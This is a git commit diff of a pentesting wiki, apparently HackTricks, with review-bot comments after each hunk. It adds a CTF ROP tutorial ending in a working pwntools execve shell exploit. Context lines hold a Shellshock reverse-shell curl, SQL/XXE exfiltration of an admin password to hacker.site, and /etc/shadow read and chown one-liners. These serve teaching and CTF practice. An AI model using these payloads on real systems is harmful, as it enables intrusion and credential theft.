GitBook: [master] 19 pages and 4 assets modified

This commit is contained in:
CPol 2021-09-25 16:33:43 +00:00 committed by gitbook-bot
parent c59e78e9c2
commit 9d85603d35
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
21 changed files with 219 additions and 78 deletions

View file

@ -514,7 +514,7 @@
* [Linux Exploiting \(Basic\) \(SPA\)](exploiting/linux-exploiting-basic-esp/README.md) * [Linux Exploiting \(Basic\) \(SPA\)](exploiting/linux-exploiting-basic-esp/README.md)
* [Format String Template](exploiting/linux-exploiting-basic-esp/format-string-template.md) * [Format String Template](exploiting/linux-exploiting-basic-esp/format-string-template.md)
* [ROP - Syscall execv](exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md) * [ROP - call sys\_execve](exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md)
* [ROP - Leaking LIBC address](exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address.md) * [ROP - Leaking LIBC address](exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address.md)
* [ROP-PWN template](exploiting/linux-exploiting-basic-esp/rop-pwn-template.md) * [ROP-PWN template](exploiting/linux-exploiting-basic-esp/rop-pwn-template.md)
* [Bypassing Canary & PIE](exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md) * [Bypassing Canary & PIE](exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md)
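Review bot: the new link text "ROP - call sys_execve" is the more accurate name, since the syscall the page invokes (number 59 / 0x3b on x86-64) is execve, not execv, which is only a libc wrapper; the file slug `rop-syscall-execv.md` still carries the old name, so either keep the slug stable on purpose (links elsewhere depend on it) or rename file and link in one follow-up commit rather than leaving title and path disagreeing indefinitely.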

View file

@ -27,12 +27,6 @@ Heap**
**Stack** **Stack**
## **1.STACK OVERFLOWS**
> buffer overflow, buffer overrun, stack overrun, stack smashing
Fallo de segmentación o violación de segmento: Cuando se intenta acceder a una dirección de memoria que no ha sido asignada al proceso.
**Sección BSS**: Variables globales o estáticas sin inicializar **Sección BSS**: Variables globales o estáticas sin inicializar
```text ```text
@ -51,19 +45,27 @@ int i = 5;
**Sección STACK**: La pila \(Argumentos pasados, cadenas de entorno \(env\), variables locales…\) **Sección STACK**: La pila \(Argumentos pasados, cadenas de entorno \(env\), variables locales…\)
## **1.STACK OVERFLOWS**
> buffer overflow, buffer overrun, stack overrun, stack smashing
Fallo de segmentación o violación de segmento: Cuando se intenta acceder a una dirección de memoria que no ha sido asignada al proceso.
\*\*\*\*
Para obtener la dirección de una función dentro de un programa se puede hacer: Para obtener la dirección de una función dentro de un programa se puede hacer:
```text ```text
objdump -d ./PROGRAMA | grep FUNCION objdump -d ./PROGRAMA | grep FUNCION
``` ```
Si necesitas una dirección del Stack el GDB modifica variables de entorno que hae que cambie la dirección con respecto ala ejecución normal:
* `unset env LINES`
* `unset env COLUMNS` ## ROP
* `set env _=path` donde path es la ruta absoluta al programa
* explotar el programa usando la ruta absoluta ### Call to sys\_execve
* asegúrate de que PWD y OLDPWD son las mismas que en gdb
{% page-ref page="rop-syscall-execv.md" %}
## **2.SHELLCODE** ## **2.SHELLCODE**
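Review bot: the `\*\*\*\*` line that sits between the moved "1.STACK OVERFLOWS" section and the objdump tip renders as an empty bold marker and should be dropped. The Spanish GDB environment-variable tip removed here (`unset env LINES`, `unset env COLUMNS`, `set env _=path`, same PWD/OLDPWD) reappears in English on the gdb page later in this commit, so the content is not lost, but the new `{% page-ref page="rop-syscall-execv.md" %}` under "### Call to sys_execve" is the only pointer left from this README to the ROP material; consider also linking the gdb page here so readers of the Spanish section can still find the address-matching trick.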

View file

@ -1,51 +1,164 @@
# ROP - Syscall execv # ROP - call sys\_execve
The objective is to call the **syscall \(execv\)** from a ROP controlling the value of registries: _RDI, RSI, RDX, RAX_ and obviously the _RIP_ \(the other ones doesn't matters\), and controlling somewhere to write _"/bin/sh"_ In order to prepare the call for the **syscall** it's needed the following configuration:
* **RDI**: Pointing to the string "/bin/bash" * `rax: 59 Specify sys_execve`
* **RSI**: Null * `rdi: ptr to "/bin/sh" specify file to execute`
* **RDX**: Null * `rsi: 0 specify no arguments passed`
* **RAX**: Value **0x3b** for x64 and **0xb** for x32, because this will call **execv** * `rdx: 0 specify no environment variables passed`
So, basically it's needed to write the string `/bin/sh` somewhere and then perform the `syscall` \(being aware of the padding needed to control the stack\).
## Control the registers
Let's start by finding **how to control those registers**:
```c
ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret"
0x0000000000415664 : pop rax ; ret
0x0000000000400686 : pop rdi ; ret
0x00000000004101f3 : pop rsi ; ret
0x00000000004498b5 : pop rdx ; ret
```
With these addresses it's possible to **write the content in the stack and load it into the registers**.
## Write string
### Writable memory
Frist you need to find a writable place in the memory
```bash ```bash
ROPgadget --binary vulnbinary | grep syscall gef> vmmap
ROPgadget --binary vulnbinary | grep "rdi\|rsi\|rdx\|rax" | grep pop [ Legend: Code | Heap | Stack ]
Start End Offset Perm Path
0x0000000000400000 0x00000000004b6000 0x0000000000000000 r-x /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
0x00000000006b6000 0x00000000006bc000 0x00000000000b6000 rw- /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
0x00000000006bc000 0x00000000006e0000 0x0000000000000000 rw- [heap]
``` ```
## Writing ### Write String
If you can somehow write to an address and then get the address of where you have written then this step is unnecessary. Then you need to find a way to write arbitrary content in this address
Elsewhere, you may search for some **write-what-where**. ```python
As is explained in this tutorial: [https://failingsilently.wordpress.com/2017/12/14/rop-chain-shell/](https://failingsilently.wordpress.com/2017/12/14/rop-chain-shell/) you have to find something that allows you to save some value inside a registry and then save it to some controlled address inside another registry. For example some `pop eax; ret` , `pop edx: ret` , `mov eax, [edx]` ROPgadget --binary speedrun-001 | grep " : mov qword ptr \["
mov qword ptr [rax], rdx ; ret #Write in the rax address the content of rdx
You can find mov gadgets doing: `ROPgadget --binary vulnbinary | grep mov`
### Finding a place to write
If you have found some **write-what-where** and can control the needed registries to call execv, there is only left finding a place to write.
```bash
objdump -x vulnbinary | grep ".bss" -B1
CONTENTS, ALLOC, LOAD, DATA
23 .bss 00000010 00403418 00403418 00002418 2**3
``` ```
In this case: **0x403418** #### 32 bits
### **Writing** _**"/bin/sh"**_ ```python
'''
Lets write "/bin/sh" to 0x6b6000
```text pop rdx, 0x2f62696e2f736800
buffer += address(pop_eax) # place value into EAX pop rax, 0x6b6000
buffer += "/bin" # 4 bytes at a time mov qword ptr [rax], rdx
buffer += address(pop_edx) # place value into edx '''
buffer += address(writable_memory)
buffer += address(writewhatwhere)
buffer += address(pop_eax) rop += popRdx # place value into EAX
buffer += "//sh" rop += "/bin" # 4 bytes at a time
buffer += address(pop_edx) rop += popRax # place value into edx
buffer += address(writable_memory + 4) rop += p32(0x6b6000) # Writable memory
buffer += address(writewhatwhere) rop += writeGadget #Address to: mov qword ptr [rax], rdx
rop += popRdx
rop += "//sh"
rop += popRax
rop += p32(0x6b6000 + 4)
rop += writeGadget
``` ```
#### 64 bits
```python
'''
Lets write "/bin/sh" to 0x6b6000
pop rdx, 0x2f62696e2f736800
pop rax, 0x6b6000
mov qword ptr [rax], rdx
'''
rop = ''
rop += popRdx
rop += "/bin/sh\x00" # The string "/bin/sh" in hex with a null byte at the end
rop += popRax
rop += p64(0x6b6000) # Writable memory
rop += writeGadget #Address to: mov qword ptr [rax], rdx
```
## Example
```python
from pwn import *
target = process('./speedrun-001')
#gdb.attach(target, gdbscript = 'b *0x400bad')
# Establish our ROP Gadgets
popRax = p64(0x415664)
popRdi = p64(0x400686)
popRsi = p64(0x4101f3)
popRdx = p64(0x4498b5)
# 0x000000000048d251 : mov qword ptr [rax], rdx ; ret
writeGadget = p64(0x48d251)
# Our syscall gadget
syscall = p64(0x40129c)
'''
Here is the assembly equivalent for these blocks
write "/bin/sh" to 0x6b6000
pop rdx, 0x2f62696e2f736800
pop rax, 0x6b6000
mov qword ptr [rax], rdx
'''
rop = ''
rop += popRdx
rop += "/bin/sh\x00" # The string "/bin/sh" in hex with a null byte at the end
rop += popRax
rop += p64(0x6b6000)
rop += writeGadget
'''
Prep the four registers with their arguments, and make the syscall
pop rax, 0x3b
pop rdi, 0x6b6000
pop rsi, 0x0
pop rdx, 0x0
syscall
'''
rop += popRax
rop += p64(0x3b)
rop += popRdi
rop += p64(0x6b6000)
rop += popRsi
rop += p64(0)
rop += popRdx
rop += p64(0)
rop += syscall
# Add the padding to the saved return address
payload = "0"*0x408 + rop
# Send the payload, drop to an interactive shell to use our new shell
target.sendline(payload)
target.interactive()
```
## References
* [https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html](https://guyinatuxedo.github.io/07-bof_static/dcquals19_speedrun1/index.html)
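Review bot: the grep in the "Control the registers" block has a typo, `grep -E "pop (rdi|rsi|rdx\rax) ; ret"` should be `grep -E "pop (rdi|rsi|rdx|rax) ; ret"`, otherwise the `pop rax ; ret` gadget shown in the output would not match; the same block is fenced as ```c although it is a shell command. The "#### 32 bits" block is inconsistent: it reuses the 64-bit `popRdx`, `popRax` and `mov qword ptr [rax], rdx` gadgets while packing with `p32`, its comments say "place value into EAX" next to `popRdx`, and `rop` is never initialised there; either rewrite it with 32-bit gadgets (`pop edx`, `pop eax`, `mov dword ptr [eax], edx`, addresses via `p32`) or remove it. In the pwntools example, `rop = ''`, `"/bin/sh\x00"` and `"0"*0x408` are `str` while `p64()` returns `bytes` under Python 3, so the concatenations raise `TypeError`; use `b''`, `b"/bin/sh\x00"` and `b"0"*0x408`, or state that the snippet targets Python 2. The assembly comments `pop rdx, 0x2f62696e2f736800` would store the bytes reversed in memory (little-endian), so the immediate that matches the `b"/bin/sh\x00"` the Python code writes is `0x0068732f6e69622f`. Minor wording: "Frist" should be "First", "Elsewhere" should be "Otherwise", and "registries" should be "registers".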

View file

@ -24,7 +24,7 @@ msfvenom /p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> [EXITFUNC=thread]
apt-get install gdb apt-get install gdb
``` ```
### Parameters: ### Parameters
**-q** --&gt; No show banner **-q** --&gt; No show banner
**-x &lt;file&gt;** --&gt; Auto-execute GDB instructions from here **-x &lt;file&gt;** --&gt; Auto-execute GDB instructions from here
@ -91,6 +91,32 @@ pattern search "avaaawaa" #Search for the offset of that substring
pattern search $rsp #Search the offset given the content of $rsp pattern search $rsp #Search the offset given the content of $rsp
``` ```
### Tricks
#### GDB same addresses
While debugging GDB will have **slightly different addresses than the used by the binary when executed.** You can make GDB have the same addresses by doing:
* `unset env LINES`
* `unset env COLUMNS`
* `set env _=<path>` _Put the absolute path to the binary_
* Exploit the binary using the same absolute route
* `PWD` and `OLDPWD` must be the same when using GDB and when exploiting the binary
#### Backtrace to find functions called
When you have a **statically linked binary** all the functions will belong to the binary \(and no to external libraries\). In this case it will be difficult to **identify the flow that the binary follows to for example ask for user input**.
You can easily identify this flow by **running** the binary with **gdb** until you are asked for input. Then, stop it with **CTRL+C** and use the **`bt`** \(**backtrace**\) command to see the functions called:
```text
gef➤ bt
#0 0x00000000004498ae in ?? ()
#1 0x0000000000400b90 in ?? ()
#2 0x0000000000400c1d in ?? ()
#3 0x00000000004011a9 in ?? ()
#4 0x0000000000400a5a in ?? ()
```
### GDB server ### GDB server
`gdbserver --multi 0.0.0.0:23947` \(in IDA you have to fill the absolute path of the executable in the Linux machine and in the Windows machine\) `gdbserver --multi 0.0.0.0:23947` \(in IDA you have to fill the absolute path of the executable in the Linux machine and in the Windows machine\)
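Review bot: two wording fixes in the new "Tricks" section: "Exploit the binary using the same absolute route" should read "path", and "and no to external libraries" should read "and not to external libraries". The explanation above the backtrace sample could also say why every frame shows `?? ()`: that means the binary carries no symbol names (it is stripped), which is what forces you to work from raw addresses; static linking on its own would still show function names if the symbols were present.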

View file

@ -744,7 +744,7 @@ And in order to read a file you could do:
print(open("/etc/shadow", "r").read()) print(open("/etc/shadow", "r").read())
``` ```
#### Example with _\*\*_Environment \(Docker breakout\) #### Example with \_\*\*\_Environment \(Docker breakout\)
You can check the enabled capabilities inside the docker container using: You can check the enabled capabilities inside the docker container using:
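Review bot: the heading change only escapes the leftover `_**_` markers (`#### Example with \_\*\*\_Environment`), so they now show up literally in the rendered page instead of disappearing; remove the stray markers so the heading reads "#### Example with Environment (Docker breakout)".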
@ -1124,6 +1124,7 @@ python -c 'import os;os.chown("/etc/shadow",1000,1000)'
``` ```
Or with the **`ruby`** binary having this capability: Or with the **`ruby`** binary having this capability:
```bash ```bash
ruby -e 'require "fileutils"; FileUtils.chown(1000, 1000, "/etc/shadow")' ruby -e 'require "fileutils"; FileUtils.chown(1000, 1000, "/etc/shadow")'
``` ```

View file

@ -128,7 +128,7 @@ The response is a JSON dictionary with some important data like:
* Signed using the **device identity certificate \(from APNS\)** * Signed using the **device identity certificate \(from APNS\)**
* **Certificate chain** includes expired **Apple iPhone Device CA** * **Certificate chain** includes expired **Apple iPhone Device CA**
![](../../../.gitbook/assets/image%20%28567%29%20%281%29%20%282%29%20%282%29%20%282%29%20%282%29.png) ![](../../../.gitbook/assets/image%20%28567%29%20%281%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29.png)
### Step 6: Profile Installation ### Step 6: Profile Installation
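Review bot: the only change is that the image filename gained yet another ` (2)` suffix, which matches the two identical 740 KiB assets in this commit; each GitBook sync appears to duplicate the asset rather than reuse it, so dedupe the references to a single file to stop the repository growing by the same image every time.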

View file

@ -5,7 +5,7 @@
This technique can be use to extract information from a user when an **HTML injection is found**. This is very useful if you **don't find any way to exploit a** [**XSS** ](xss-cross-site-scripting/)but you can **inject some HTML tags**. This technique can be use to extract information from a user when an **HTML injection is found**. This is very useful if you **don't find any way to exploit a** [**XSS** ](xss-cross-site-scripting/)but you can **inject some HTML tags**.
It is also useful if some **secret is saved in clear text** in the HTML and you want to **exfiltrate** it from the client, or if you want to mislead some script execution. It is also useful if some **secret is saved in clear text** in the HTML and you want to **exfiltrate** it from the client, or if you want to mislead some script execution.
Several techniques commented here can be used to bypass some ****[**Content Security Policy**](content-security-policy-csp-bypass.md) by exfiltrating information in unexpected ways \(html tags, CSS, http-meta tags, forms, base...\). Several techniques commented here can be used to bypass some **\*\*\[**Content Security Policy\*\*\]\(content-security-policy-csp-bypass.md\) by exfiltrating information in unexpected ways \(html tags, CSS, http-meta tags, forms, base...\).
## Main Applications ## Main Applications
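Review bot: the new version breaks the link: `**\*\*\[**Content Security Policy\*\*\]\(content-security-policy-csp-bypass.md\)` escapes the brackets and parentheses, so the reference to the CSP bypass page renders as literal text instead of a link. The root cause is the stray `****` before the link in the old line; remove those empty bold markers and keep the plain `[**Content Security Policy**](content-security-policy-csp-bypass.md)`.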
@ -209,7 +209,6 @@ This can be mitigated with something like: _**sandbox= allow-scripts allow-to
You could use **`meta http-equiv`** to perform **several actions** like setting a Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` or performing a redirect \(in 5s in this case\): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />` You could use **`meta http-equiv`** to perform **several actions** like setting a Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` or performing a redirect \(in 5s in this case\): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`
This can be **avoided** with a **CSP** regarding **http-equiv** \( `Content-Security-Policy: default-src 'self';`, or `Content-Security-Policy: http-equiv 'self';`\) This can be **avoided** with a **CSP** regarding **http-equiv** \( `Content-Security-Policy: default-src 'self';`, or `Content-Security-Policy: http-equiv 'self';`\)
### New &lt;portal HTML tag ### New &lt;portal HTML tag
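Review bot: while touching this region, the unchanged context line's `Content-Security-Policy: http-equiv 'self';` is not a directive defined by any CSP level, so that part of the mitigation sentence should be corrected or removed rather than carried forward; only the `default-src 'self'` alternative on the same line is a real policy.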
@ -227,21 +226,19 @@ Not all the ways to leak connectivity in HTML will be useful for Dangling Markup
## Brute-Force Detection List ## Brute-Force Detection List
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/dangling\_markup.txt" %} {% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/dangling\_markup.txt" caption="" %}
## References ## References
All the techniques presented here and more can view reviewed with more details in: All the techniques presented here and more can view reviewed with more details in:
{% embed url="http://lcamtuf.coredump.cx/postxss/" %} {% embed url="http://lcamtuf.coredump.cx/postxss/" caption="" %}
Another HTML tags that can be abused can be find here: Another HTML tags that can be abused can be find here:
{% embed url="http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/" %} {% embed url="http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/" caption="" %}
More info: More info:
{% embed url="https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup" %} {% embed url="https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup" caption="" %}
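Review bot: grammar in the "References" block that this hunk touches: "can view reviewed with more details in" should read "can be reviewed in more detail in", and "Another HTML tags that can be abused can be find here" should read "Other HTML tags that can be abused can be found here"; the `caption=""` additions themselves are fine.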

View file

@ -29,7 +29,7 @@ wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../
**Mixing several \*nix LFI lists and adding more paths I have created this one:** **Mixing several \*nix LFI lists and adding more paths I have created this one:**
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_linux.txt" %} {% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_linux.txt" caption="" %}
Try also to change `/` for `\` Try also to change `/` for `\`
Try also to add `../../../../../` Try also to add `../../../../../`
@ -40,7 +40,7 @@ A list that uses several techniques to find the file /etc/password \(to check if
Merging several lists I have created: Merging several lists I have created:
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_windows.txt" %} {% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_windows.txt" caption="" %}
Try also to change `/` for `\` Try also to change `/` for `\`
Try also to remove `C:/` and add `../../../../../` Try also to remove `C:/` and add `../../../../../`
@ -53,7 +53,7 @@ Check the LFI list of linux.
## Basic LFI and bypasses ## Basic LFI and bypasses
All the examples are for Local File Inclusion but could be applied to Remote File Inclusion also \(page=[http://myserver.com/phpshellcode.txt\](http://myserver.com/phpshellcode.txt\)\). All the examples are for Local File Inclusion but could be applied to Remote File Inclusion also \(page=[http://myserver.com/phpshellcode.txt\](http://myserver.com/phpshellcode.txt%29\).
```text ```text
http://example.com/index.php?page=../../../etc/passwd http://example.com/index.php?page=../../../etc/passwd
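Review bot: the link target is still wrong after this change; `\)` became `%29`, so the URL now ends in an encoded `)` (`http://myserver.com/phpshellcode.txt%29`). The closing parenthesis belongs to the surrounding prose, not to the URL, so write it as `(page=[http://myserver.com/phpshellcode.txt](http://myserver.com/phpshellcode.txt))`.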
@ -330,7 +330,7 @@ Other possible log paths:
/var/log/httpd/error_log /var/log/httpd/error_log
``` ```
Fuzzing wordlist: https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI Fuzzing wordlist: [https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI)
### Via Email ### Via Email

View file

@ -248,6 +248,7 @@ select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
``` ```
### Out of band data exfiltration via XXE ### Out of band data exfiltration via XXE
```sql ```sql
a' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.hacker.site/"> %remote;]>'),'/l') FROM dual-- - a' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.hacker.site/"> %remote;]>'),'/l') FROM dual-- -
``` ```

View file

@ -74,7 +74,7 @@ Or **automate** this with **nmap** plugin `smtp-ntlm-info.nse`
Some SMTP servers auto-complete a sender's address when command "MAIL FROM" is issued without a full address, disclosing its internal name: Some SMTP servers auto-complete a sender's address when command "MAIL FROM" is issued without a full address, disclosing its internal name:
``` ```text
220 somedomain.com Microsoft ESMTP MAIL Service, Version: Y.Y.Y.Y ready at Wed, 15 Sep 2021 12:13:28 +0200 220 somedomain.com Microsoft ESMTP MAIL Service, Version: Y.Y.Y.Y ready at Wed, 15 Sep 2021 12:13:28 +0200
EHLO all EHLO all
250-somedomain.com Hello [x.x.x.x] 250-somedomain.com Hello [x.x.x.x]

View file

@ -287,3 +287,4 @@ Entry_1:
Description: Need Username Description: Need Username
Command: hydra -v -V -u -l {Username} -P {Big_Passwordlist} -t 1 -u {IP} ssh Command: hydra -v -V -u -l {Username} -P {Big_Passwordlist} -t 1 -u {IP} ssh
``` ```
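Review bot: the hydra command passes `-u` twice (`-u -l {Username} ... -t 1 -u {IP} ssh`); in hydra `-u` is a flag with no argument (loop over users before passwords), so the second occurrence is redundant and `{IP}` only works because it is parsed as the positional target. Drop the second `-u` so the line reads `hydra -v -V -u -l {Username} -P {Big_Passwordlist} -t 1 {IP} ssh`.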

View file

@ -13,7 +13,7 @@ Exploiting this vulnerability the **page could throw an error**.
You could **find** this vulnerability noticing that it is using an **old Apache version** and **cgi\_mod** \(with cgi folder\) or using **nikto**. You could **find** this vulnerability noticing that it is using an **old Apache version** and **cgi\_mod** \(with cgi folder\) or using **nikto**.
#### **Test** ### **Test**
Most tests are based in echo something and expect that that string is returned in the web response. If you think a page may be vulnerable, search for all the cgi pages and test them. Most tests are based in echo something and expect that that string is returned in the web response. If you think a page may be vulnerable, search for all the cgi pages and test them.
@ -23,7 +23,7 @@ Most tests are based in echo something and expect that that string is returned i
nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
``` ```
#### **Curl \(reflected, blind and out-of-band\)** ### **Curl \(reflected, blind and out-of-band\)**
```bash ```bash
# Reflected # Reflected
@ -40,7 +40,7 @@ curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http:
python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi
``` ```
#### Exploit ### Exploit
```bash ```bash
#Bind Shell #Bind Shell